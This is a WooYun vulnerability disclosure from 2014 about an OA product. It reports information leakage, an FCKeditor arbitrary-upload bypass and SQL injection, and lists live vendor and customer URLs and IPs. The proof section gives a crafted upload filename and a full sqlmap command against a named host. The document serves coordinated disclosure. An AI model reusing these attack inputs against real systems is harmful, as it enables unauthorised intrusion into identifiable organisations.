当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071282

漏洞标题:某OA系统存在sql注射+任意文件上传+信息泄露

相关厂商:www.syc.com.cn

漏洞作者: Anyway13

提交时间:2014-08-06 18:35

修复时间:2014-09-20 18:38

公开时间:2014-09-20 18:38

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-06: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

简要描述:

用户还是挺吊的。。
http://www.syc.com.cn/sys/Article/case/userlist/

详细说明:

问题案例举例:
http://oa.syc.com.cn/OA/index/index.aspx
http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx
http://221.199.203.230:9001/dsoa/index/index.aspx
http://180.166.56.106/dsoa/index/index0.aspx
http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx
1.后台信息泄露,访问后台虽然提示未登录,但是还是能显示部分内容,比如:
http://oa.syc.com.cn/oa/useradmin/index.aspx
2.oa使用2.6.3版本的fckeditor编辑器,可以上传任意文件,只不过需要点奇葩的文件名:
http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp
3.无需登录存在搜索型sql注射:
http://oa.syc.com.cn/oa/useradmin/index.aspx

漏洞证明:

用官网做证明:
1.后台信息泄露,访问后台虽然提示未登录,但是还是能显示部分内容,很多目录都这样,访问:http://oa.syc.com.cn/oa/useradmin/index.aspx

syc1.jpg


2.oa使用2.6.3版本的fckeditor编辑器,可以上传任意文件,只不过需要点奇葩的文件名:
http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp
本地构造上传页面:

syc2.jpg


这里按理说可以用asp的那个%00 url-decode截断上传的,但是各种传不上,变成随机文件名,这里就可以使用传说中的那个奇葩文件名来达到上传a.aspx.a;.a.aspx.jpg..jpg
3.无需登录存在搜索型sql注射:
http://oa.syc.com.cn/oa/useradmin/index.aspx
这个不完整的页面搜索功能还是可以用的:
sqlmap.py -u "http://oa.syc.com.cn/oa/useradmin/UserListNew.aspx" --data "__TabStrip1_State__=0&__ToolbarUserAdmin_State__=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzg1NDQwNjM4D2QWAgIBD2QWAgIDD2QWBGYPZBYEAg0PDxYCHgRUZXh0ZWRkAg8PPCsABgEADxYCHhFTZWxlY3RlZE5vZGVJbmRleGVkZAIBDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUJVGFiU3RyaXAxBRBUb29sYmFyVXNlckFkbWluwmO8Vml2IqiSkVWHQ62EgRlTww0%3D&__EVENTVALIDATION=%2FwEWAwKyicXjCwLN8eLGBwL9ruiTCIzo13VmxpbPYb4N7Kky5Vaefe0T&txtSearchUName=111&btnSearchUName1=%B2%E9+%D1%AF"

syc3.jpg

修复方案:

身份验证,过滤啥的。。
还没得过奖金如何是好!前面的洞都是小厂商流程好桑心!>_<

版权声明:转载请注明来源 Anyway13@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-11 10:39

厂商回复:

CNVD确认所述情况,同时由CNVD按以往建立的联系渠道向软件生产厂商通报,并将相关案例发给对应的多个分中心处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-17 22:41 | Anyway13 ( 普通白帽子 | Rank:135 漏洞数:24 | 爱你等于爱自己。)

    @xsser 这样的洞没奖金的吗? WooYun: 双杨OA系统SQL注射+内部文件下载+官网中招 这个有啊。。

  2. 2014-12-23 21:43 | orange ( 普通白帽子 | Rank:185 漏洞数:38 | 戒骄戒躁。)

    @Anyway13 貌似提交时你没选择通用型.......

  3. 2015-01-26 13:23 | Anyway13 ( 普通白帽子 | Rank:135 漏洞数:24 | 爱你等于爱自己。)

    @orange好像是这样的。。